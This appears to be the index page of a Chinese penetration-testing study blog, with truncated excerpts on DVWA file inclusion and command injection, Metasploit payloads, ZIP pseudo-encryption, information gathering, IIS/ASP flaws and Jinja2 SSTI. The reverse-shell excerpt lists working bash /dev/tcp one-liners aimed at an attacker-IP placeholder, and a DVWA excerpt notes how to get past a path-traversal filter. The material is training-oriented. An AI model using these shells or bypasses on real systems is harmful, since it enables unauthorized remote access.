dvwa文件包含
DVWA靶场-文件包含漏洞等级:low1234<?php// The page we wish to display$file = $_GET[ 'page' ];?>
源码很简单,就是获取一个get参数直接../../php.info成功获取php配置信息证明漏洞
DVWA靶场-文件包含漏洞等级:medium1234567<?php// The page we wish to display$file = $_GET[ 'page' ];// Input validation$file = str_replace( array( "http://", "https://" ), "", $file );$file = str_replace( array( "../", "..\\" ), "", $file );?>
相比于low,就是多出了对../和..\的过滤直接使用…/./就可以绕过
DVWA靶 ...
内网渗透工具
Metasploit基本模块辅助模块:Auxiliary渗透攻击模块:exploit攻击载荷模块:payload编码模块:encoder
渗透攻击模块相当于“破门工具”,它们只负责利用 Drupal 的漏洞黑进去,但不包含进去之后给你什么样的终端控制权。
攻击载荷模块
反弹 Shell (Reverse Shell)
特征关键字: reverse (最常见的是 reverse_tcp)
工作原理: 目标机器主动连接回你(攻击机)的 IP 和端口。这通常用于绕过目标机器的防火墙拦截入站规则。
名字示例: php/meterpreter/reverse_tcp、cmd/unix/reverse_netcat、linux/x86/meterpreter/reverse_tcp
正向 Shell (Bind Shell)
特征关键字: bind (最常见的是 bind_tcp)
工作原理: 目标机器在本地开放一个端口(比如 4444),然后你(攻击机)主动去连接它。如果目标机器有防火墙,这种方式很容易被拦截。
名字示例: php/meterpreter/bind_tcp、cmd/unix/ ...
日志取证
应用程序的种类:
.exe .inl .conf.config.ymal.yml.properties
日志:
.log .csv .txt .bat
特殊:
apache .out
访问时间可以找.ink
ZIP隐写
zip伪加密技术原理1.压缩源文件数据区:12345650 4B 03 04:这是头文件标记 (0x04034b50)14 00:解压文件所需 pkware 版本00 00:全局方式位标记(判断有无加密)08 00:压缩方式5A 7E:最后修改文件时间F7 46:最后修改文件日期
2.压缩源文件目录区:123456750 4B 01 02:目录中文件文件头标记 (0x02014b50)1F 00:压缩使用的 pkware 版本14 00:解压文件所需 pkware 版本00 00:全局方式位标记(判断是否为伪加密)08 00:压缩方式5A 7E:最后修改文件时间F7 46:最后修改文件日期
3.压缩源文件目录结束标志:1234567850 4B 05 06:目录结束标记00 00:当前磁盘编号00 00:目录区开始磁盘编号01 00:本磁盘上纪录总数01 00:目录区中纪录总数59 00 00 00:目录区尺寸大小3E 00 00 00:目录区对第一张磁盘的偏移量00 00:ZIP 文件注释长度
判断是否加密:注意:
全局方式位标记的四个数字中只有第二个数字对其有影响,其它的不管为 ...
dvwa命令执行
DVWA靶场-命令执行漏洞等级:low12345678910111213141516171819<?phpif( isset( $_POST[ 'Submit' ] ) ) { // 获取参数 $target = $_REQUEST[ 'ip' ]; // 指定os并使用命令 if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // 若Windows,则执行 $cmd = shell_exec( 'ping ' . $target ); } else { // 若为类unix,则执行 $cmd = shell_exec( 'ping -c 4 ' . $target ); } // Feedback for the end user $html .= "<pre>{$cmd}</pre>" ...
反弹shell
定义将输入输出的shell交互式终端转移到其他机器的一种技术
反弹shell合集bash反弹shellTCP协议攻击者:nc -lvvp 4444受害者:1234567891011/bin/bash -i >& /dev/tcp/攻击机ip/4444 0>&1/bin/bash -i > /dev/tcp/攻击机ip/4444 0<& 2>&1exec 5<>/dev/tcp/攻击机ip/4444;cat <&5 | while read line; do $line 2>&5 >&5; doneexec /bin/sh 0</dev/tcp/攻击机ip/4444 1>&0 2>&00<&196;exec 196<>/dev/tcp/攻击机ip/4444; sh <&196 >&196 2>&196
UDP协议首先在本地监听UDP协议4444端口
123nc -u -lv ...
信息收集简介
简介渗透的本质是信息收集,信息收集也叫做资产收集。
信息收集是渗透测试的前期主要工作,是非常重要的环节,收集足够多的信息才能方便接下来的测试,信息收集主要是收集网站的域名信息、子域名信息、目标网站信息、目标网站真实ip、敏感目录文件、开放端口等等信息
分类
服务器相关信息
网站指纹识别
whois信息,姓名,备案,邮箱,电话反查,开饭端口,WAF等
子域名收集,旁站,C段
google hacking针对化搜索,word/电子表格/pdf,中间件版本,弱口令扫描等
方法
whois查询
域名分为根域名和子域名
收集子域名
端口扫描
服务器需要开放服务,就必须要开放端口,常见的端口是tcp和udp两种类型
范围:0-65535
查找真实ip
企业的网站,为了提高访问速度,或者避免黑客攻击,会使用cdn服务
探测旁站及C段
旁站一个服务器上有多个网站,可以通过ip查询服务器上的网站
C段::查找同一段服务器上的网站,可以查到同样的类型和服务器
网络空间搜索引擎
通过这些引擎查找网站或者服务器信息,进行下一步渗透
扫描敏感目录/文件
通过扫描目录和文件,大致了解网站的结 ...
语言特性漏洞
1 asp安全1.1 MDB默认下载一般架构:windows+iis+asp+access(selserver)
access 数据库一般后缀名:asp、asa、mdbmdb在网站目录下面
思路:如果知道这个数据库地址,可以尝试下载数据库文件,获取当前管理员账号密码信息
1.2 ASP后门植入数据库是asp的格式,可以直接上传木马格式来实现后门植入
1.3 IIS短文件名漏洞1.3.1 漏洞描述此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
1.3.2 短文件名特征
只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的6个字符是相同的,后面的数字进行递
后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。
1.4 IIS文件解析漏洞1、目录解析:以xx.asp命名的文件夹里的文件都将会被当成ASP文件执行。2、文件解析:xx.a ...
python ssti漏洞
SSTI 概述与模版引擎基础在 Python 中,SSTI(服务端模板注入)经常与 Jinja2、Django、Mako、Tornado 等模版引擎结合。其核心思想是:利用模板引擎解析机制的疏忽,将用户的不安全输入作为模板代码执行。
模版引擎基础语法 (Jinja2)Python 的模版引擎大多采用相似的语法结构:
{% ... %}:用于执行控制语句(如 for 循环、if 判断、赋值)。
{{ ... }}:用于表达式求值,并将结果打印渲染到页面上。
存在漏洞的测试环境代码以下是一个典型的 Flask + Jinja2 漏洞环境(app.py):
12345678910111213141516171819from flask import Flask, request, render_template_stringapp = Flask(__name__)app.config['SECRET_KEY'] = 'Super_Secret_Admin_Key'@app.route ...
无线网络安全
概述无线网络可分为狭义无线网络和广义无线网络狭义无线网络是基于802.11b/g/n标准的无线局域网,即所谓的“无线网络”
无线网络存在的安全风险和安全问题主要有:(1) 来自网络用户的攻击(2) 未认证的用户获取存取权(3) 来自公司的窃听秘密
种类
Wi-Fi (IEEE 802.11): 这是最广泛使用的无线局域网 (WLAN) 技术标准,有多个版本,例如:802.11a, 802.11b, 802.11g, 802.11n, 802.11ac, 802.11ax (Wi-Fi 6), 802.11be (Wi-Fi 7) 等。 每个版本都带来了更高的速度、更广的覆盖范围和更强的功能。
蓝牙 (Bluetooth): 一种短距离无线通信技术,主要用于连接个人电子设备,例如手机、耳机、键盘等。 蓝牙也有多个版本,例如 Bluetooth 1.0, Bluetooth 2.0, Bluetooth 5.0 等,每个版本都提升了速度、范围和功耗效率。






